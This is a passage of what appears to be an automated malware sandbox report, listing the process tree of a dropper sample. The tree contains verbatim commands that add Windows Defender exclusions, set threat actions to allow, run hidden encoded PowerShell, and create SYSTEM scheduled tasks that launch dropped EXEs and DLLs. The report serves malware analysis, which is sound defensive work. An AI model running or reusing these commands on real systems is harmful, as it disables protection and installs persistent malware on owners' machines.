                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:1648
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:544
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CEeleiYZJwzU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CEeleiYZJwzU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EEyBGLyNhBQJC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EEyBGLyNhBQJC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IIEnZMGGdUpRCiRQNPR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IIEnZMGGdUpRCiRQNPR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RxqkbpJktHUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RxqkbpJktHUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pyzxKMonU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pyzxKMonU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\gACrTqPGDfEUMoVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\gACrTqPGDfEUMoVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\tFtbOrNgdShbbWhjh\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\tFtbOrNgdShbbWhjh\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LpVNNBeiFNrXupnv\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LpVNNBeiFNrXupnv\" /t REG_DWORD /d 0 /reg:64;"
                                        2⤵
                                        • Drops file in System32 directory
                                        • System Location Discovery: System Language Discovery
                                        • Modifies data under HKEY_USERS
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2892
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CEeleiYZJwzU2" /t REG_DWORD /d 0 /reg:32
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2296
                                          • C:\Windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CEeleiYZJwzU2" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                              PID:3352
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CEeleiYZJwzU2" /t REG_DWORD /d 0 /reg:64
                                            3⤵
                                              PID:5116
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EEyBGLyNhBQJC" /t REG_DWORD /d 0 /reg:32
                                              3⤵
                                                PID:3068
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EEyBGLyNhBQJC" /t REG_DWORD /d 0 /reg:64
                                                3⤵
                                                  PID:2044
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IIEnZMGGdUpRCiRQNPR" /t REG_DWORD /d 0 /reg:32
                                                  3⤵
                                                    PID:744
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IIEnZMGGdUpRCiRQNPR" /t REG_DWORD /d 0 /reg:64
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2468
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RxqkbpJktHUn" /t REG_DWORD /d 0 /reg:32
                                                    3⤵
                                                      PID:3160
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RxqkbpJktHUn" /t REG_DWORD /d 0 /reg:64
                                                      3⤵
                                                        PID:2940
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pyzxKMonU" /t REG_DWORD /d 0 /reg:32
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:3192
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pyzxKMonU" /t REG_DWORD /d 0 /reg:64
                                                        3⤵
                                                          PID:5052
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\gACrTqPGDfEUMoVB /t REG_DWORD /d 0 /reg:32
                                                          3⤵
                                                            PID:4764
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\gACrTqPGDfEUMoVB /t REG_DWORD /d 0 /reg:64
                                                            3⤵
                                                              PID:1740
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                              3⤵
                                                                PID:4620
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:872
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:3708
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2280
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\tFtbOrNgdShbbWhjh /t REG_DWORD /d 0 /reg:32
                                                                3⤵
                                                                  PID:2012
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\tFtbOrNgdShbbWhjh /t REG_DWORD /d 0 /reg:64
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2704
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LpVNNBeiFNrXupnv /t REG_DWORD /d 0 /reg:32
                                                                  3⤵
                                                                    PID:2276
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LpVNNBeiFNrXupnv /t REG_DWORD /d 0 /reg:64
                                                                    3⤵
                                                                      PID:4428
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /CREATE /TN "gdCtJjfjt" /SC once /ST 01:16:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                    2⤵
                                                                    • Scheduled Task/Job: Scheduled Task
                                                                    PID:4720
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /run /I /tn "gdCtJjfjt"
                                                                    2⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2196
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /DELETE /F /TN "gdCtJjfjt"
                                                                    2⤵
                                                                      PID:4964
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /CREATE /TN "BRxNgaTQiHvgdzaBM" /SC once /ST 00:13:01 /RU "SYSTEM" /TR "\"C:\Windows\Temp\LpVNNBeiFNrXupnv\ghBjhzozqXgolsA\GliGRbY.exe\" rz /DYGPdidXk 525403 /S" /V1 /F
                                                                      2⤵
                                                                      • Drops file in Windows directory
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:3552
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /run /I /tn "BRxNgaTQiHvgdzaBM"
                                                                      2⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:5008
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 876
                                                                      2⤵
                                                                      • Program crash
                                                                      PID:1552
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                    1⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:908
                                                                    • C:\Windows\system32\gpupdate.exe
                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                      2⤵
                                                                        PID:4052
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                      1⤵
                                                                        PID:2072
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                        1⤵
                                                                          PID:4540
                                                                        • C:\Windows\system32\gpscript.exe
                                                                          gpscript.exe /RefreshSystemParam
                                                                          1⤵
                                                                            PID:1588
                                                                          • C:\Windows\Temp\LpVNNBeiFNrXupnv\ghBjhzozqXgolsA\GliGRbY.exe
                                                                            C:\Windows\Temp\LpVNNBeiFNrXupnv\ghBjhzozqXgolsA\GliGRbY.exe rz /DYGPdidXk 525403 /S
                                                                            1⤵
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            • Drops Chrome extension
                                                                            • Drops file in System32 directory
                                                                            • Drops file in Program Files directory
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Modifies data under HKEY_USERS
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:4584
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                              2⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:2816
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                3⤵
                                                                                • Indirect Command Execution
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:2800
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                  4⤵
                                                                                    PID:4904
                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                      5⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:2148
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                  3⤵
                                                                                  • Indirect Command Execution
                                                                                  PID:2040
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                    4⤵
                                                                                      PID:1200
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                        5⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2944
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                    3⤵
                                                                                    • Indirect Command Execution
                                                                                    PID:1648
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                      4⤵
                                                                                        PID:544
                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                          5⤵
                                                                                            PID:4076
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                        3⤵
                                                                                        • Indirect Command Execution
                                                                                        PID:5040
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                          4⤵
                                                                                            PID:3556
                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                              5⤵
                                                                                                PID:3320
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                            3⤵
                                                                                            • Indirect Command Execution
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:2624
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                              4⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:4208
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                5⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1180
                                                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                  6⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:2468
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /DELETE /F /TN "bRatCwuzSAqtQGBopq"
                                                                                          2⤵
                                                                                            PID:2992
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                            2⤵
                                                                                              PID:3708
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                3⤵
                                                                                                • Indirect Command Execution
                                                                                                PID:4428
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  4⤵
                                                                                                    PID:2244
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      5⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1080
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        6⤵
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2820
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\pyzxKMonU\uKMjhu.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jxSHWytTgPdArPa" /V1 /F
                                                                                                2⤵
                                                                                                • Drops file in Windows directory
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:1028
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "jxSHWytTgPdArPa2" /F /xml "C:\Program Files (x86)\pyzxKMonU\WIqpIvO.xml" /RU "SYSTEM"
                                                                                                2⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:4624
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /END /TN "jxSHWytTgPdArPa"
                                                                                                2⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2140
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /DELETE /F /TN "jxSHWytTgPdArPa"
                                                                                                2⤵
                                                                                                  PID:2968
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "GwXcjhtdlNliky" /F /xml "C:\Program Files (x86)\CEeleiYZJwzU2\YosfTAv.xml" /RU "SYSTEM"
                                                                                                  2⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:4564
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "rhNYxoQCUARfl2" /F /xml "C:\ProgramData\gACrTqPGDfEUMoVB\KjiEycI.xml" /RU "SYSTEM"
                                                                                                  2⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:4936
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "UoGqoNONmEanoYEFH2" /F /xml "C:\Program Files (x86)\IIEnZMGGdUpRCiRQNPR\NpLcWrx.xml" /RU "SYSTEM"
                                                                                                  2⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:5000
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "AAvCxyzPjbKlhxUnJbO2" /F /xml "C:\Program Files (x86)\EEyBGLyNhBQJC\hCTrGCZ.xml" /RU "SYSTEM"
                                                                                                  2⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:2376
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "ESuJugrexHiQWLznz" /SC once /ST 01:47:14 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\LpVNNBeiFNrXupnv\QORuiBWE\XaeqeeS.dll\",#1 /PrqHdidZm 525403" /V1 /F
                                                                                                  2⤵
                                                                                                  • Drops file in Windows directory
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:4912
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /run /I /tn "ESuJugrexHiQWLznz"
                                                                                                  2⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:2060
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /DELETE /F /TN "BRxNgaTQiHvgdzaBM"
                                                                                                  2⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:460
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4584 -s 2336
                                                                                                  2⤵
                                                                                                  • Program crash
                                                                                                  PID:4696
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2080 -ip 2080
                                                                                                1⤵
                                                                                                  PID:776
                                                                                                • C:\Windows\system32\rundll32.EXE
                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\LpVNNBeiFNrXupnv\QORuiBWE\XaeqeeS.dll",#1 /PrqHdidZm 525403
                                                                                                  1⤵
                                                                                                    PID:4300
                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\LpVNNBeiFNrXupnv\QORuiBWE\XaeqeeS.dll",#1 /PrqHdidZm 525403
                                                                                                      2⤵
                                                                                                      • Blocklisted process makes network request
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Loads dropped DLL
                                                                                                      • Enumerates system info in registry
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:4668
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /DELETE /F /TN "ESuJugrexHiQWLznz"
                                                                                                        3⤵
                                                                                                          PID:4196
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3356 -ip 3356
                                                                                                      1⤵
                                                                                                        PID:1648
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4584 -ip 4584
                                                                                                        1⤵
                                                                                                          PID:3448

                                                                                                        Network

                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

                                                                                                          Filesize

                                                                                                          129B

                                                                                                          MD5

                                                                                                          a526b9e7c716b3489d8cc062fbce4005

                                                                                                          SHA1

                                                                                                          2df502a944ff721241be20a9e449d2acd07e0312

                                                                                                          SHA256

